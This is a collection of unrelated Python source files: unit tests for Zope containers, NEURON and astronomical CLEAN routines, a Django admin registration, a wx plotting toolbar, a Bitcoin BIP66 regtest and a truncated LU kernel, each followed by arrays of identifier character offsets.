1539
],
[
1622,
1634
]
],
[
[
1404,
1416
],
[
1542,
1554
],
[
1636,
1648
]
],
[
[
1515,
1524
],
[
1650,
1659
]
],
[
[
1568,
1571
],
[
1689,
1692
]
]
] |
from persistent.interfaces import IPersistent
import lxml.objectify
import mock
import unittest
import zeit.cms.workingcopy.interfaces
import zeit.edit.container
import zeit.edit.testing
import zeit.edit.tests.fixture
import zope.interface
import zope.security.proxy
class TestContainer(unittest.TestCase):
def get_container(self):
parent = mock.Mock()
parent._p_changed = False
zope.interface.alsoProvides(parent, IPersistent)
class Container(zeit.edit.container.Base):
def _add(self, item):
pass
def _delete(self, key):
pass
def _get_keys(self, node):
return []
return Container(parent, mock.Mock())
def test_delitem_should_set_p_changed(self):
container = self.get_container()
del container['foo']
self.assertTrue(container.__parent__._p_changed)
def test_add_should_set_p_changed(self):
container = self.get_container()
item = mock.Mock()
item.__name__ = 'item'
item.__parent__ = None
container.add(item)
self.assertTrue(container.__parent__._p_changed)
def test_updateOrder_should_set_p_changed(self):
container = self.get_container()
container.updateOrder([])
self.assertTrue(container.__parent__._p_changed)
class UnknownBlockTest(zeit.edit.testing.FunctionalTestCase):
def test_no_factory_for_node_returns_UnknownBlock(self):
xml = lxml.objectify.fromstring("""
<container xmlns:cp="http://namespaces.zeit.de/CMS/cp">
<block cp:type="block" cp:__name__="foo"/>
<something cp:__name__="bar"/>
</container>
""")
container = zeit.edit.tests.fixture.Container(mock.Mock(), xml)
self.assertTrue(zeit.edit.interfaces.IUnknownBlock.providedBy(
container['bar']))
class ContainerTest(zeit.edit.testing.FunctionalTestCase):
def setUp(self):
super(ContainerTest, self).setUp()
self.context = mock.Mock()
zope.interface.alsoProvides(self.context, IPersistent)
self.container = zeit.edit.tests.fixture.Container(
self.context, lxml.objectify.fromstring('<container/>'))
def test_slice(self):
blocks = [self.container.create_item('block') for i in range(4)]
expected = [blocks[0], blocks[1]]
expected = [x.__name__ for x in expected]
actual = [x.__name__ for x in self.container.slice(
blocks[0].__name__, blocks[1].__name__)]
self.assertEqual(expected, actual)
def test_get_recursive_finds_item_in_self(self):
block = self.container.create_item('block')
self.assertEqual(block, self.container.get_recursive(block.__name__))
def test_get_recursive_finds_item_in_child_container(self):
other = self.container.create_item('container')
block = other.create_item('block')
self.assertEqual(block, self.container.get_recursive(block.__name__))
def test_moving_item_between_containers_sends_event(self):
check_move = mock.Mock()
zope.component.getGlobalSiteManager().registerHandler(
check_move, (zeit.edit.interfaces.IBlock,
zope.lifecycleevent.IObjectMovedEvent))
block = self.container.create_item('block')
other = zeit.edit.tests.fixture.Container(
self.context, lxml.objectify.fromstring('<container/>'))
del self.container[block.__name__]
other.add(block)
self.assertTrue(check_move.called)
def test_moved_item_has_new_parent(self):
# Annoying mechanics gymnastics to check that security works.
wc = zeit.cms.workingcopy.interfaces.IWorkingcopy(None)
self.container.__parent__ = wc
other = zeit.edit.tests.fixture.Container(
wc, lxml.objectify.fromstring('<container/>'))
block = self.container.create_item('block')
del self.container[block.__name__]
wrapped = zope.security.proxy.ProxyFactory(block)
other.add(wrapped)
# Since we don't retrieve block from other, this actually checks that
# __parent__ was changed.
self.assertEqual(other, block.__parent__)
def test_getitem_with_int_uses_position(self):
block = self.container.create_item('block')
self.assertEqual(block, self.container[0])
with self.assertRaises(KeyError):
self.container[1]
| [
[
[
34,
45
],
[
446,
457
],
[
2107,
2118
]
],
[
[
53,
67
],
[
1500,
1504
],
[
2206,
2210
],
[
3431,
3435
],
[
3872,
3876
]
],
[
[
75,
79
],
[
356,
360
],
[
723,
727
],
[
1015,
1019
],
[
1776,
1780
],
[
2045,
2049
],
[
3108,
3112
]
],
[
[
87,
95
],
[
289,
297
]
],
[
[
103,
134
]
],
[
[
142,
161
]
],
[
[
169,
186
]
],
[
[
194,
217
],
[
1385,
1389
],
[
1918,
1922
],
[
484,
488
],
[
1742,
1746
],
[
1818,
1822
],
[
2145,
2149
],
[
3208,
3212
],
[
3370,
3374
],
[
3715,
3719
],
[
3821,
3825
]
],
[
[
225,
239
]
],
[
[
247,
266
],
[
410,
414
],
[
2065,
2069
],
[
3128,
3132
],
[
3262,
3266
],
[
4028,
4032
]
],
[
[
275,
288
]
],
[
[
1368,
1384
]
],
[
[
1904,
1917
],
[
1993,
2006
]
]
] |
from django.contrib import admin
from .models import Artists, Albums, Tracks
# Register your models here.
admin.site.register([Artists, Albums, Tracks]) | [
[
[
27,
32
],
[
107,
112
]
],
[
[
53,
60
],
[
128,
135
]
],
[
[
62,
68
],
[
137,
143
]
],
[
[
70,
76
],
[
145,
151
]
]
] |
import numpy as np
import astropy.units as u
from astropy.convolution.kernels import Gaussian2DKernel
from scipy import signal
from ..clean import clean, ms_clean, component, radial_prolate_sphereoidal,\
vec_radial_prolate_sphereoidal
from ..transform import dft_map, idft_map
def test_clean_ideal():
n = m = 65
pos1 = [15, 30]
pos2 = [40, 32]
clean_map = np.zeros((n, m))
clean_map[pos1[0], pos1[1]] = 10.
clean_map[pos2[0], pos2[1]] = 7.
dirty_beam = np.zeros((n, m))
dirty_beam[(n-1)//4:(n-1)//4 + (n-1)//2, (m-1)//2] = 0.75
dirty_beam[(n-1)//2, (m-1)//4:(m-1)//4 + (m-1)//2, ] = 0.75
dirty_beam[(n-1)//2, (m-1)//2] = 0.8
dirty_beam = np.pad(dirty_beam, (65, 65), 'constant')
dirty_map = signal.convolve(clean_map, dirty_beam, mode='same')
# Disable convolution of model with gaussian for testing
out_map = clean(dirty_map, dirty_beam, clean_beam_width=0.0)
# Within threshold default threshold of 0.1
assert np.allclose(clean_map, (out_map[0]+out_map[1]), out_map, atol=dirty_beam.max() * 0.1)
def test_component():
comp = np.zeros((3, 3))
comp[1, 1] = 1.0
res = component(scale=0, shape=(3, 3))
assert np.array_equal(res, comp)
res = component(scale=1, shape=(3, 3))
assert np.array_equal(res, comp)
res = component(scale=2, shape=(6, 6))
assert np.all(res[0, :] == 0.0)
assert np.all(res[:, 0] == 0.0)
assert np.all(res[2:4, 2:4] == res.max())
res = component(scale=3, shape=(7, 7))
assert np.all(res[0, :] == 0.0)
assert np.all(res[:, 0] == 0.0)
assert res[3, 3] == 1
def test_radial_prolate_spheroidal():
amps = [radial_prolate_sphereoidal(r) for r in [-1.0, 0.0, 0.5, 1.0, 2.0]]
assert amps[0] == 1.0
assert amps[1] == 1.0
assert amps[2] == 0.36106538453111797
assert amps[3] == 0.0
assert amps[4] == 0.0
def test_vec_radial_prolate_spheroidal():
radii = np.linspace(-0.5, 1.5, 1000)
amps1 = [radial_prolate_sphereoidal(r) for r in radii]
amps2 = vec_radial_prolate_sphereoidal(radii)
assert np.allclose(amps1, amps2)
def test_ms_clean_ideal():
n = m = 65
pos1 = [15, 30]
pos2 = [40, 32]
clean_map = np.zeros((n, m))
clean_map[pos1[0], pos1[1]] = 10.
clean_map[pos2[0], pos2[1]] = 7.
dirty_beam = np.zeros((n, m))
dirty_beam[(n-1)//4:(n-1)//4 + (n-1)//2, (m-1)//2] = 0.75
dirty_beam[(n-1)//2, (m-1)//4:(m-1)//4 + (m-1)//2, ] = 0.75
dirty_beam[(n-1)//2, (m-1)//2] = 1.0
dirty_beam = np.pad(dirty_beam, (65, 65), 'constant')
dirty_map = signal.convolve2d(clean_map, dirty_beam, mode='same')
# Disable convolution of model with gaussian for testing
model, res = ms_clean(dirty_map, dirty_beam, scales=[1], clean_beam_width=0.0)
recovered = model + res
# Within threshold default threshold
assert np.allclose(clean_map, recovered, atol=dirty_beam.max() * 0.1)
def test_clean_sim():
n = m = 32
data = Gaussian2DKernel(stddev=3.0, x_size=n, y_size=m).array
# data = np.zeros((n, m))
# data[13,13] = 10.0
# data[12:14,12:14] = 10.0/4.0
half_log_space = np.logspace(np.log10(0.03030303), np.log10(0.48484848), 10)
theta = np.linspace(0, 2*np.pi, 32)
theta = theta[np.newaxis, :]
theta = np.repeat(theta, 10, axis=0)
r = half_log_space
r = r[:, np.newaxis]
r = np.repeat(r, 32, axis=1)
x = r * np.sin(theta)
y = r * np.cos(theta)
sub_uv = np.vstack([x.flatten(), y.flatten()])
sub_uv = np.hstack([sub_uv, np.zeros((2, 1))]) / u.arcsec
# Factor of 9 is compensate for the factor of 3 * 3 increase in size
dirty_beam = idft_map(np.ones(321)*9, (n*3, m*3), sub_uv)
vis = dft_map(data, sub_uv)
dirty_map = idft_map(vis, (n, m), sub_uv)
clean_map, res = clean(dirty_map, dirty_beam, clean_beam_width=0)
np.allclose(data, clean_map + res, atol=dirty_beam.max() * 0.1)
| [
[
[
7,
18
],
[
381,
383
],
[
491,
493
],
[
692,
694
],
[
989,
991
],
[
1110,
1112
],
[
1203,
1205
],
[
1284,
1286
],
[
1365,
1367
],
[
1401,
1403
],
[
1437,
1439
],
[
1527,
1529
],
[
1563,
1565
],
[
1935,
1937
],
[
2084,
2086
],
[
2211,
2213
],
[
2321,
2323
],
[
2522,
2524
],
[
2860,
2862
],
[
3140,
3142
],
[
3152,
3154
],
[
3174,
3176
],
[
3213,
3215
],
[
3230,
3232
],
[
3259,
3261
],
[
3286,
3288
],
[
3352,
3354
],
[
3372,
3374
],
[
3410,
3412
],
[
3436,
3438
],
[
3464,
3466
],
[
3515,
3517
],
[
3534,
3536
],
[
3665,
3667
],
[
3856,
3858
]
],
[
[
26,
44
],
[
3555,
3556
]
],
[
[
85,
101
],
[
2973,
2989
]
],
[
[
121,
127
],
[
750,
756
],
[
2580,
2586
]
],
[
[
149,
154
],
[
878,
883
],
[
3803,
3808
]
],
[
[
156,
164
],
[
2713,
2721
]
],
[
[
166,
175
],
[
1159,
1168
],
[
1240,
1249
],
[
1321,
1330
],
[
1483,
1492
]
],
[
[
177,
203
],
[
1666,
1692
],
[
1977,
2003
]
],
[
[
210,
240
],
[
2035,
2065
]
],
[
[
265,
272
],
[
3712,
3719
]
],
[
[
274,
282
],
[
3656,
3664
],
[
3751,
3759
]
],
[
[
289,
305
]
],
[
[
1081,
1095
]
],
[
[
1620,
1650
]
],
[
[
1885,
1919
]
],
[
[
2116,
2135
]
],
[
[
2929,
2943
]
]
] |
# -*-coding:Utf-8 -*
from mplotlab import App
from matplotlib.backend_bases import NavigationToolbar2
import wx
class Cursors:
# this class is only used as a simple namespace
HAND, POINTER, SELECT_REGION, MOVE = list(range(4))
cursors = Cursors()
cursord = {
cursors.MOVE : wx.CURSOR_HAND,
cursors.HAND : wx.CURSOR_HAND,
cursors.POINTER : wx.CURSOR_ARROW,
cursors.SELECT_REGION : wx.CURSOR_CROSS,
}
class Navigation(NavigationToolbar2):
def __init__(self,*a,**k):
NavigationToolbar2.__init__(self, *a,**k)
def _init_toolbar(self,*args,**kwargs):
pass
def set_message(self,s):
""" display in the status bar
the mouseover data (x,y)
"""
try:
App().mainWin.GetStatusBar().SetStatusText(s,0)
except:
pass
def set_cursor(self, cursor):
cursor =wx.StockCursor(cursord[cursor])
self.canvas.SetCursor( cursor )
def dynamic_update(self):
d = self._idle
self._idle = False
if d:
self.canvas.draw()
self._idle = True
def press(self, event):
if self._active == 'ZOOM':
self.wxoverlay = wx.Overlay()
def release(self, event):
if self._active == 'ZOOM':
# When the mouse is released we reset the overlay and it
# restores the former content to the window.
self.wxoverlay.Reset()
del self.wxoverlay
def draw_rubberband(self, event, x0, y0, x1, y1):
# Use an Overlay to draw a rubberband-like bounding box.
dc = wx.ClientDC(self.canvas)
odc = wx.DCOverlay(self.wxoverlay, dc)
odc.Clear()
# Mac's DC is already the same as a GCDC, and it causes
# problems with the overlay if we try to use an actual
# wx.GCDC so don't try it.
if 'wxMac' not in wx.PlatformInfo:
dc = wx.GCDC(dc)
height = self.canvas.figure.bbox.height
y1 = height - y1
y0 = height - y0
if y1<y0: y0, y1 = y1, y0
if x1<y0: x0, x1 = x1, x0
w = x1 - x0
h = y1 - y0
rect = wx.Rect(x0, y0, w, h)
rubberBandColor = '#C0C0FF' # or load from config?
# Set a pen for the border
color = wx.NamedColour(rubberBandColor)
dc.SetPen(wx.Pen(color, 1))
# use the same color, plus alpha for the brush
r, g, b = color.Get()
color.Set(r,g,b, 0x60)
dc.SetBrush(wx.Brush(color))
dc.DrawRectangleRect(rect)
| [
[
[
45,
48
],
[
807,
810
]
],
[
[
87,
105
],
[
468,
486
],
[
530,
548
]
],
[
[
116,
118
],
[
303,
305
],
[
339,
341
],
[
378,
380
],
[
424,
426
],
[
944,
946
],
[
1277,
1279
],
[
1694,
1696
],
[
1734,
1736
],
[
1982,
1984
],
[
2017,
2019
],
[
2264,
2266
],
[
2403,
2405
],
[
2454,
2456
],
[
2614,
2616
]
],
[
[
128,
135
],
[
258,
265
]
],
[
[
248,
255
],
[
288,
295
],
[
324,
331
],
[
360,
367
],
[
400,
407
]
],
[
[
271,
278
],
[
959,
966
]
],
[
[
457,
467
]
]
] |
"""
UnitTests of the python interface to the neuron class.
Items declared in neuron/__init__.py
$Id$
"""
import unittest
import neuron
from neuron import h
class NeuronTestCase(unittest.TestCase):
"""Tests of neuron"""
def testHClass(self):
"""Test subclass of hoc class."""
from ._subclass import A1
a = A1(5)
assert a.x == 5.0
assert a.p() == 6.0
b = A1(4)
a.s = "one"
b.s = "two"
assert a.s == "one"
assert b.s == "two"
assert h.A[0].s == "one"
assert a.p() == 7.0
assert b.p() == 5.0
a.a = 2
b.a = 3
assert a.a == 2
assert b.a == 3
assert h.List("A").count() == 2
a = 1
b = 1
assert h.List("A").count() == 0
@classmethod
def psection(cls):
"""Test neuron.psection(Section)"""
s = h.Section(name="soma")
neuron.psection(s)
def testpsection(self):
from multiprocessing import Process
p = Process(target=NeuronTestCase.psection)
p.start()
p.join()
def testABI(self):
"""Test use of some Py_LIMITED_API for python3."""
# Py_nb_bool
assert True if h else False
assert True if h.List else False
# ensure creating a List doesn't change the truth value
l = h.List()
assert True if h.List else False
assert False if l else True
v = h.Vector(1)
l.append(v)
assert True if l else False
# Py_sq_length
assert len(l) == 1
# Py_sq_item
assert l[0] == v
# Py_sq_ass_item
v.x[0] = 5
assert v.x[0] == 5
def testIterators(self):
"""Test section, segment, mechanism, rangevar iterators."""
# setup model
sections = [h.Section(name="s%d" % i) for i in range(3)]
iclamps = [h.IClamp(sec(0.5)) for sec in sections]
for i, sec in enumerate(sections):
sec.nseg = 3
sec.insert("pas")
sec.insert("hh")
# iterate
import hashlib
sha = hashlib.sha256()
for sec in h.allsec():
for seg in sec:
for mech in seg:
for var in mech:
txt = "%s(%g).%s.%s=%g" % (
sec.name(),
seg.x,
mech.name(),
var.name(),
var[0],
)
sha.update(txt.encode("utf-8"))
d = sha.hexdigest()
d1 = "ac49344c054bc9e56e165fa75423d8bcb7cce96c4527f259362b527ee05103d8"
# in case NRN_ENABLE_MOD_COMPATIBILITY=ON
# (set by -DNRN_ENABLE_CORENEURON=ON)
d2 = "44366906aa94a50644bc734eb23afcc25d1206c0431c4e7908698eeb2597c385"
assert d == d1 or d == d2
sections[0](0.5).na_ion.ena = 40.0 # issue #651
assert sections[0](0.5).na_ion.ena == 40.0
def testSectionArgOrder(self):
"""First optional arg for Section is name (but name="name" is recommended)"""
soma = h.Section("soma")
assert soma.name() == "soma"
def testSectionCell(self):
"""Section.cell() internally referenced as weakref."""
err = -1
try:
soma = h.Section(cell="foo", name="soma")
err = 1
except:
err = 0
assert err == 0
class Cell:
def __str__(self):
return "hello"
c = Cell()
soma = h.Section(cell=c, name="soma")
assert soma.name() == "hello.soma"
assert soma.cell() == c
del c
assert soma.cell() is None
def testSectionListIterator(self):
"""As of v8.0, iteration over a SectionList does not change the cas"""
# See issue 509. SectionList iterator bug requires change to
# longstanding behavior
soma = h.Section(name="soma")
soma.push()
sections = [h.Section(name="s%d" % i) for i in range(3)]
assert len([s for s in h.allsec()]) == 4
sl = h.SectionList(sections)
# Iteration over s SectionList does not change the currently accessed section
for s in sl:
assert 1 and h.cas() == soma
# If an iteration does not complete the section stack is still ok.
assert sections[1] in sl
assert 2 and h.cas() == soma
@classmethod
def ExtendedSection(cls):
"""test prsection (modified print statement)"""
from neuron.sections import ExtendedSection
s = ExtendedSection(name="test")
s.psection()
def testExtendedSection(self):
from multiprocessing import Process
p = Process(target=NeuronTestCase.ExtendedSection)
p.start()
p.join()
@classmethod
def RxDexistence(cls):
"""test import rxd and geometry3d"""
error = 0
try:
from neuron import rxd
from neuron.rxd import geometry
print("has_geometry3d is " + str(geometry.has_geometry3d))
except Exception as e:
print("'from neuron import rxd' failed", e)
error = 1
else:
try:
a = basicRxD3D()
print(" basicRxD3D() ran with no exception")
except Exception as e:
print("'basicRxD3D()' failed", e)
error = 1
assert error == 0
return 0
def testHelp(self):
error = False
try:
from neuron import doc
print(doc.get_docstring("xpanel", ""))
except Exception as e:
print("'doc.get_docstring('xpanel', '')' failed:", e)
error = True
self.assertFalse(error)
return 0
def testRxDexistence(self):
from multiprocessing import Process
p = Process(target=NeuronTestCase.RxDexistence)
p.start()
p.join()
assert p.exitcode == 0
return 0
def test_newobj_err(self):
"""Test deletion of incompletely constructed objects"""
print() # Error message not on above line
h.load_file("stdlib.hoc") # need hoc String
h(
"""
begintemplate Foo
endtemplate Foo
begintemplate NewObj
objref this, ob, foo1, foo2
proc init() {localobj s
foo1 = new Foo() // Constructed before error, even partial constructions fill this field.
if ($1 == 0) {
execerror("generate an error") // All NewObj instances undergoing construction
} else if ($1 == $2) {
// This and all NewObj instances prior to this will construct successfully.
// All after this will be partially constructed.
// The execerror should cause only the partially constructed NewObj to
// be destroyed.
s = new String()
sprint(s.s, "ob = new NewObj(%d, %d)", $1-1, $2)
execute1(s.s, this)
} else {
ob = new NewObj($1-1, $2)
}
foo2 = new Foo() // Only instances prior to execute1 reach here.
}
endtemplate NewObj
"""
)
# arg[0] recursion depth
# arg[0] - arg[1] + 1 should be successfully constructed
# arg[1] should be partially constructed and destroyed.
args = (4, 2)
a = h.NewObj(*args)
b = h.List("NewObj")
c = h.List("Foo")
print("#NewObj and #Foo in existence", b.count(), c.count())
z = args[0] - args[1] + 1
assert b.count() == z
assert c.count() == 2 * z
del a
del b
del c
b = h.List("NewObj")
c = h.List("Foo")
print("after del a #NewObj and #Foo in existence", b.count(), c.count())
assert b.count() == 0
assert c.count() == 0
return 1
def basicRxD3D():
from neuron import h, rxd
s = h.Section(name="s")
s.L = s.diam = 1
cyt = rxd.Region([s])
ca = rxd.Species(cyt)
rxd.set_solve_type(dimension=3)
h.finitialize(-65)
h.fadvance()
return 1
def suite():
suite = unittest.makeSuite(NeuronTestCase, "test")
return suite
if __name__ == "__main__":
# unittest.main()
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite())
| [
[
[
114,
122
],
[
181,
189
],
[
8171,
8179
],
[
8046,
8054
]
],
[
[
130,
136
],
[
924,
930
]
],
[
[
156,
157
],
[
533,
534
],
[
702,
703
],
[
770,
771
],
[
893,
894
],
[
1233,
1234
],
[
1269,
1270
],
[
1363,
1364
],
[
1395,
1396
],
[
1461,
1462
],
[
1837,
1838
],
[
1901,
1902
],
[
2160,
2161
],
[
3159,
3160
],
[
3358,
3359
],
[
3591,
3592
],
[
3981,
3982
],
[
4044,
4045
],
[
4120,
4121
],
[
4151,
4152
],
[
4307,
4308
],
[
4452,
4453
],
[
6215,
6216
],
[
6268,
6269
],
[
7282,
7283
],
[
7310,
7311
],
[
7339,
7340
],
[
7575,
7576
],
[
7604,
7605
]
],
[
[
166,
180
],
[
1044,
1058
],
[
4795,
4809
],
[
5948,
5962
],
[
8065,
8079
]
],
[
[
7783,
7793
],
[
5294,
5304
]
],
[
[
8024,
8029
],
[
8223,
8228
]
],
[
[
8162,
8168
],
[
8212,
8218
]
]
] |
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test BIP66 (DER SIG).
Test that the DERSIG soft-fork activates at (regtest) height 1251.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.mininode import *
from test_framework.blocktools import create_coinbase, create_block
from test_framework.script import CScript
from io import BytesIO
DERSIG_HEIGHT = 1251
# Reject codes that we might receive in this test
REJECT_INVALID = 16
REJECT_OBSOLETE = 17
REJECT_NONSTANDARD = 64
# A canonical signature consists of:
# <30> <total len> <02> <len R> <R> <02> <len S> <S> <hashtype>
def unDERify(tx):
"""
Make the signature in vin 0 of a tx non-DER-compliant,
by adding padding after the S-value.
"""
scriptSig = CScript(tx.vin[0].scriptSig)
newscript = []
for i in scriptSig:
if (len(newscript) == 0):
newscript.append(i[0:-1] + b'\0' + i[-1:])
else:
newscript.append(i)
tx.vin[0].scriptSig = CScript(newscript)
def create_transaction(node, coinbase, to_address, amount):
from_txid = node.getblock(coinbase)['tx'][0]
inputs = [{ "txid" : from_txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
tx = CTransaction()
tx.deserialize(BytesIO(hex_str_to_bytes(signresult['hex'])))
return tx
class BIP66Test(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.extra_args = [['-whitelist=127.0.0.1', '-dip3params=9000:9000']]
self.setup_clean_chain = True
def run_test(self):
self.nodes[0].add_p2p_connection(P2PInterface())
network_thread_start()
# wait_for_verack ensures that the P2P connection is fully up.
self.nodes[0].p2p.wait_for_verack()
self.log.info("Mining %d blocks", DERSIG_HEIGHT - 2)
self.coinbase_blocks = self.nodes[0].generate(DERSIG_HEIGHT - 2)
self.nodeaddress = self.nodes[0].getnewaddress()
self.log.info("Test that a transaction with non-DER signature can still appear in a block")
spendtx = create_transaction(self.nodes[0], self.coinbase_blocks[0],
self.nodeaddress, 1.0)
unDERify(spendtx)
spendtx.rehash()
tip = self.nodes[0].getbestblockhash()
block_time = self.nodes[0].getblockheader(tip)['mediantime'] + 1
block = create_block(int(tip, 16), create_coinbase(DERSIG_HEIGHT - 1), block_time)
block.nVersion = 2
block.vtx.append(spendtx)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(self.nodes[0].getbestblockhash(), block.hash)
self.log.info("Test that blocks must now be at least version 3")
tip = block.sha256
block_time += 1
block = create_block(tip, create_coinbase(DERSIG_HEIGHT), block_time)
block.nVersion = 2
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), tip)
wait_until(lambda: "reject" in self.nodes[0].p2p.last_message.keys(), lock=mininode_lock)
with mininode_lock:
assert_equal(self.nodes[0].p2p.last_message["reject"].code, REJECT_OBSOLETE)
assert_equal(self.nodes[0].p2p.last_message["reject"].reason, b'bad-version(0x00000002)')
assert_equal(self.nodes[0].p2p.last_message["reject"].data, block.sha256)
del self.nodes[0].p2p.last_message["reject"]
self.log.info("Test that transactions with non-DER signatures cannot appear in a block")
block.nVersion = 3
spendtx = create_transaction(self.nodes[0], self.coinbase_blocks[1],
self.nodeaddress, 1.0)
unDERify(spendtx)
spendtx.rehash()
# First we show that this tx is valid except for DERSIG by getting it
# rejected from the mempool for exactly that reason.
assert_raises_rpc_error(-26, '64: non-mandatory-script-verify-flag (Non-canonical DER signature)', self.nodes[0].sendrawtransaction, bytes_to_hex_str(spendtx.serialize()), True)
# Now we verify that a block with this transaction is also invalid.
block.vtx.append(spendtx)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), tip)
wait_until(lambda: "reject" in self.nodes[0].p2p.last_message.keys(), lock=mininode_lock)
with mininode_lock:
# We can receive different reject messages depending on whether
# dashd is running with multiple script check threads. If script
# check threads are not in use, then transaction script validation
# happens sequentially, and dashd produces more specific reject
# reasons.
assert self.nodes[0].p2p.last_message["reject"].code in [REJECT_INVALID, REJECT_NONSTANDARD]
assert_equal(self.nodes[0].p2p.last_message["reject"].data, block.sha256)
if self.nodes[0].p2p.last_message["reject"].code == REJECT_INVALID:
# Generic rejection when a block is invalid
assert_equal(self.nodes[0].p2p.last_message["reject"].reason, b'block-validation-failed')
else:
assert b'Non-canonical DER signature' in self.nodes[0].p2p.last_message["reject"].reason
self.log.info("Test that a version 3 block with a DERSIG-compliant transaction is accepted")
block.vtx[1] = create_transaction(self.nodes[0],
self.coinbase_blocks[1], self.nodeaddress, 1.0)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.nodes[0].p2p.send_and_ping(msg_block(block))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), block.sha256)
if __name__ == '__main__':
BIP66Test().main()
| [
[
[
354,
374
],
[
1643,
1663
]
],
[
[
407,
408
]
],
[
[
445,
446
],
[
1531,
1543
],
[
1573,
1589
],
[
1906,
1918
],
[
1931,
1951
],
[
2946,
2955
],
[
2972,
2984
],
[
3346,
3355
],
[
3372,
3384
],
[
3442,
3452
],
[
3517,
3530
],
[
3545,
3558
],
[
3572,
3584
],
[
3661,
3673
],
[
3763,
3775
],
[
4335,
4358
],
[
4468,
4484
],
[
4766,
4775
],
[
4792,
4804
],
[
4862,
4872
],
[
4937,
4950
],
[
4965,
4978
],
[
5428,
5440
],
[
5658,
5670
],
[
6236,
6245
],
[
6262,
6274
]
],
[
[
485,
500
],
[
2695,
2710
],
[
3190,
3205
]
],
[
[
502,
514
],
[
2668,
2680
],
[
3172,
3184
]
],
[
[
549,
556
],
[
970,
977
],
[
1203,
1210
]
],
[
[
572,
579
],
[
1565,
1572
]
],
[
[
581,
594
],
[
2113,
2126
],
[
2186,
2199
],
[
2711,
2724
],
[
3206,
3219
]
],
[
[
653,
667
],
[
5380,
5394
],
[
5566,
5580
]
],
[
[
673,
688
],
[
3632,
3647
]
],
[
[
694,
712
],
[
5396,
5414
]
],
[
[
824,
832
],
[
2488,
2496
],
[
4144,
4152
]
],
[
[
1227,
1245
],
[
2382,
2400
],
[
4038,
4056
],
[
5996,
6014
]
],
[
[
1633,
1642
],
[
6364,
6373
]
]
] |
import collections
EstimatorSetting = collections.namedtuple(
'EstimatorSetting', ['title', 'estimator', 'parameter_space'])
| [
[
[
7,
18
],
[
39,
50
]
],
[
[
20,
36
]
]
] |
# coding=utf-8
from OTLMOW.PostenMapping.StandaardPost import StandaardPost
from OTLMOW.PostenMapping.StandaardPostMapping import StandaardPostMapping
# Generated with PostenCreator. To modify: extend, do not edit
class Post060339901(StandaardPost):
def __init__(self):
super().__init__(
nummer='0603.39901',
beschrijving='Heropvoegen van betonstraatstenen volgens 6-3.4',
meetstaateenheid='M2',
mappings=[StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BestratingVanBetonstraatsteen',
attribuutURI='',
dotnotatie='',
defaultWaarde='',
range='',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=1,
isBasisMapping=1,
mappingStatus='wordt gemapt 2.0',
mappingOpmerking='Activiteit [Heropvoegen] komt niet voor in de OTL',
standaardpostnummer='0603.39901')])
| [
[
[
62,
75
],
[
236,
249
]
],
[
[
130,
150
],
[
468,
488
]
],
[
[
222,
235
]
]
] |
import sys, inspect, re
from os.path import basename, split
__all__ = ['this_tests']
class RegisterTestsPerAPI:
apiTestsMap = dict()
@staticmethod
def this_tests(testedapi):
prev_frame = inspect.currentframe().f_back.f_back
pathfilename, line_number, test_function_name, lines, index = inspect.getframeinfo(prev_frame)
lineno_parentfunc, parent_func = get_parent_func(line_number, get_lines(pathfilename))
list_test = [{'file': basename(pathfilename), 'test': test_function_name , 'line': str(lineno_parentfunc)}]
fq_apiname = full_name_with_qualname(testedapi)
if fq_apiname in RegisterTestsPerAPI.apiTestsMap:
RegisterTestsPerAPI.apiTestsMap[fq_apiname] = RegisterTestsPerAPI.apiTestsMap[fq_apiname] + list_test
else:
RegisterTestsPerAPI.apiTestsMap[fq_apiname] = list_test
def this_tests(testedapi):
RegisterTestsPerAPI.this_tests(testedapi)
def full_name_with_qualname(testedapi):
return f'{testedapi.__module__}.{testedapi.__qualname__}'
def set_default(obj):
if isinstance(obj, set): return list(obj)
raise TypeError
def get_parent_func(lineno, lines):
for idx,l in enumerate(reversed(lines[:lineno])):
if re.match(f'^def test', l): return (lineno - (idx+1)), l
return None
def get_lines(file):
with open(file, 'r') as f: return f.readlines()
| [
[
[
7,
10
]
],
[
[
12,
19
],
[
210,
217
],
[
317,
324
]
],
[
[
21,
23
],
[
1245,
1247
]
],
[
[
44,
52
],
[
475,
483
]
],
[
[
54,
59
]
],
[
[
61,
68
]
],
[
[
93,
112
],
[
642,
661
],
[
733,
752
],
[
687,
706
],
[
816,
835
],
[
906,
925
]
],
[
[
878,
888
]
],
[
[
953,
976
],
[
582,
605
]
],
[
[
1057,
1068
]
],
[
[
1148,
1163
],
[
391,
406
]
],
[
[
1322,
1331
],
[
420,
429
]
]
] |
# Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
import math
import numpy as np
import dace
import polybench
N = dace.symbol('N')
#datatypes = [dace.float64, dace.int32, dace.float32]
datatype = dace.float64
# Dataset sizes
sizes = [{N: 40}, {N: 120}, {N: 400}, {N: 2000}, {N: 4000}]
args = [([N, N], datatype)]
def init_array(A):
n = N.get()
for i in range(0, n, 1):
for j in range(0, i + 1, 1):
# Python does modulo, while C does remainder ...
A[i, j] = datatype(-(j % n)) / n + 1
for j in range(i + 1, n, 1):
A[i, j] = datatype(0)
A[i, i] = datatype(1)
A[:] = np.dot(A, np.transpose(A))
@dace.program(datatype[N, N])
def lu(A):
for i in range(0, N, 1):
for j in range(0, i, 1):
@dace.map
def k_loop1(k: _[0:j]):
i_in << A[i, k]
j_in << A[k, j]
